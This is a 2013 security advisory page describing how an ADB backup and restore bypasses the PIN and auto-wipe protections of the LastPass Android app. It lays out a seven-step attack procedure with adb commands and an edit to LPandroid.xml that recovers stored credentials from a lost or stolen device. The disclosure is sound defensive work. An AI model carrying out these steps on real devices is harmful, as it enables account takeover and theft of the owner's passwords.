Exploit the possiblities

LastPass Android Container PIN / Auto-Wipe Bypass

LastPass Android Container PIN / Auto-Wipe Bypass
Posted Nov 13, 2013
Authored by Chris John Riley

LastPass suffers from container PIN and auto-wipe security feature bypass vulnerabilities.

tags | advisory, vulnerability, bypass
advisories | CVE-2013-5113, CVE-2013-5114
MD5 | f052c12e26ca0c1cbe9bc92f377cc123

LastPass Android Container PIN / Auto-Wipe Bypass

Change Mirror Download
LastPass Android container PIN and auto-wipe security feature bypass

Product: LastPass (Android)
Project Homepage: lastpass.com
Internal Advisory ID: c22-2013-02
Vulnerable Version(s): Android version 2.0.4 (and prior)
Tested Version: Android 2.0.4 (Android 4.2/4.3)
Vendor Notification: Aug 13, 2013
Public Disclosure: November XX, 2013
Vulnerability Type: Authentication Bypass Issues [CWE-592]
CVE Reference: CVE-2013-5113, CVE-2013-5114
Issue Severity: Important impact
CVSSv2 Base Score: 6.6 (AV:L/AC:L/AU:N/C:C/I:C/A:N)
Discovery: Chris John Riley ( http://blog.c22.cc )

Advisory Details:

Effected versions of LastPass on the Android platform allow
for users with limited access via the ADB (Android Debug Bridge)
interface of an Android device (USB debugging enabled, no root access
required) to perform backup and restore of applications and application
data. The ADB backup functionality requires an Android device running
the Ice-Cream Sandwich version of Android (4.x) or above.
LastPass on Android allows the user to store the lastpass.com username
and password within the Android container, and set a PIN to prevent
unauthorized access in the event the device is lost or stolen. This
PIN protection also sets an auto-wipe feature that will delete
application data after 10 false logons.
Due to the way recent versions of Android implements the backup and
restore process, both the implemented PIN protection and the enforced
auto-wipe can be avoided and entirely bypassed to allow attackers the
ability to clear or recover the PIN from application settings data
stored in LPandroid.xml.
Using a simple process, it is possible for an attacker with physical
access to a device to backup the LastPass Android container and remove
any PIN protections present on the application. It is also possible to
restore the LastPass Android container to a secondary device and
maintain live access to changes made by the user either via the
lastpass.com web interface or the original device's LastPass Android
application. This exposes not only cached username and password data
stored within the LastPass Android container acquired by an attacker, but
also any changes made after the fact.

Attackers can extract and possibly maintain access to a user’s LastPass
data from a lost or stolen device. This effectively allows an attacker
the ability to use the recovered credentials from LastPass to perform
account takeover using the LastPass data.

1) Gain physical access to an Android device containing the LastPass
2) Enable USB debugging (if not already enabled)
3) Perform backup of the LastPass application using ADB
(adb backup com.lastpass.lpandroid)
4) Extract the resulting Android Backup file (using for example the
ab_unpacker.py tool available here -->
https://github.com/ChrisJohnRiley/Random_Code/tree/master/android backup
5) Edit the extracted LPandroid.xml file to remove the following values
6) Repack the directory structure (using for example the
ab_upacker.py tool available here -->
https://github.com/ChrisJohnRiley/Random_Code/tree/master/android backup
7) Restore to either the original device or a secondary attacker
controlled Android device using ADB (adb restore edited_backup.ab)

LastPass have released a new version to the Google Play store that
corrects these issue by disabling the ability to perform an ADB backup
of the LastPass container. It has been confirmed that the version
2.5.1 is no longer directly susceptible to this attack method.

At this time LastPass have not provided an advisory discussing the issue

Vulnerability Timeline:

May, 2013 - Initial discovery of vulnerability
Aug 13, 2013 - LastPass contacted with request for secure communications
Aug 13, 2013 - Response from LastPass setting up secure communications
Aug 13, 2013 - Details reported to LastPass
Aug 13, 2013 - Clarification of issue
Aug 13, 2013 - Response from LastPass that allowBackup:false is now set
in all new releases (change already implemented in testing prior to
the report being received)
Aug 16, 2013 - CVE numbers sent to LastPass
Aug 28, 2013 - Name added to LastPass acknowledgements page
June 30, 2013 - Initial Answer from GOOD
Aug 8, 2013 - Telephone conference with GOOD (cancelled)
Sept 05, 2013 - Response that issues resolved to LastPass's satisfaction
Sept 05, 2013 - Re-Tested and advised of new bypass
Sept 05, 2013 - Blog post released demonstrating process
Sept 06, 2013 - Acceptance of risk associated with new Bypass (low risk)
Nov 13, 2013 - Advisory released (delayed)


RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?

Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

January 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    2 Files
  • 2
    Jan 2nd
    13 Files
  • 3
    Jan 3rd
    16 Files
  • 4
    Jan 4th
    39 Files
  • 5
    Jan 5th
    26 Files
  • 6
    Jan 6th
    40 Files
  • 7
    Jan 7th
    2 Files
  • 8
    Jan 8th
    16 Files
  • 9
    Jan 9th
    25 Files
  • 10
    Jan 10th
    28 Files
  • 11
    Jan 11th
    44 Files
  • 12
    Jan 12th
    32 Files
  • 13
    Jan 13th
    2 Files
  • 14
    Jan 14th
    4 Files
  • 15
    Jan 15th
    31 Files
  • 16
    Jan 16th
    15 Files
  • 17
    Jan 17th
    16 Files
  • 18
    Jan 18th
    24 Files
  • 19
    Jan 19th
    15 Files
  • 20
    Jan 20th
    5 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    0 Files
  • 24
    Jan 24th
    0 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags


packet storm

© 2018 Packet Storm. All rights reserved.

Security Services
Hosting By